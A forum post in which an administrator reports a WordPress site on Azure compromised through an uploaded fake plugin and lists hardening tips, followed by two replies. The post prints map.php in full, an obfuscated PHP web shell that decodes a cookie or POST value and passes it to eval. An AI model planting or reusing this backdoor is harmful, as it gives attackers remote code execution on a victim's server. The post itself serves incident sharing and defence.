Malware Wordpress on Azure


Recently received a security alert on a wordpress webapp running on Azure: 


1. There was a non-recognized authentication as admin user

2. The user Uploaded a .zip file to the plugins folder that contained 2 files: map.php and apikey.php

3. The user performed a "test" through the "plugin"


Example of the code map.php:



<?php $GLOBALS['_79565595_']=Array('str_' .'rot13','pack','st' .'rrev'); ?><?php function _1178619035($i){$a=Array("jweyc","aeskoly","owhggiku","callbrhy","H*");return $a[$i];} ?><?php function l__0($_0){return isset($_COOKIE[$_0])?$_COOKIE[$_0]:@$_POST[$_0];}$_1=l__0(_1178619035(0)) .l__0(_1178619035(1)) .l__0(_1178619035(2)) .l__0(_1178619035(3));if(!empty($_1)){$_1=$GLOBALS['_79565595_'][0](@$GLOBALS['_79565595_'][1](_1178619035(4),$GLOBALS['_79565595_'][2]($_1)));if(isset($_1)){@eval($_1);exit();}}



Example of code apikey.php:



 * @package api key
Plugin Name: api key

if ("hello"==$_GET["test"])
 echo "testtrue";
 echo "true";



Image of the "Plugin" on the wordpress site: 



Sucuri sent out an alert that the .zip file was uploaded to the site. At this point there is no easy way to find the affected files on a Wordpress installation even using some tools like the sucuri scanner tool online. 



 . Enable Sucuri plugin on your WP

 . Enable WAF v2 on your webapp

 . If possible isolate your resource using App Service Environment

 . Harden NSG(s)

 . Perform a SSL Test on your web app


If you have any other tip recommendation please share!

2 Replies

@Dave Rendón 


I recently came across with Professional WordPress Development Agency, they have experts who will guide you and resolve each and every bug that is occurring on your website. I think you should contact them so that they can help you out in "Malware WordPress on Azure".

Thanks @camilajames, sorry for the late response, I was able to solve it thru Kudu Console and some 3rd party plugins. Will keep your recommendation handy.